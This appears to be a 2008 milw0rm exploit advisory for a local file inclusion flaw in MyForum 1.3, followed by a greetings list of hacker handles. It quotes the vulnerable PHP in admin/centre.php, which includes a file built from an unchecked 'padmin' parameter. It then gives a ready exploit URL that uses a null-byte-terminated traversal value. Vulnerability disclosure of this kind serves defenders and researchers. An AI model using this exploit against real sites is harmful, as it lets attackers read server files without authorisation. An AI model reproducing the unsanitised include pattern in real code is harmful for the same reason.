[o]------------------------------------------------------------------------------------[x]
| Local File Inclusion Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : MyForum 1.3 |
| Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip | |
| Date : 27 October 2008 |
| Author : Vrs-hCk |
| Contact : d00r[at]telkom[dot]net |
[o]------------------------------------------------------------------------------------[o]
[»] Vulnerable
./admin/centre.php
3: if (isset($padmin))
4: {
5:
6: $fichier = "padmin/".$padmin.".php";
7:
8: if (file_exists($fichier))
9: {
10: include ($fichier);
11: }
[»] Exploit
http://[site]/[path]/admin/centre.php?padmin=[LFI]%00
[o]------------------------------------------------------------------------------------[x]
| Greetz |
[o]------------------------------------------------------------------------------------[o]
| All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org |
| Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, |
| loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang, |
| chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!! |
[o]------------------------------------------------------------------------------------[o]
# milw0rm.com [2008-10-27]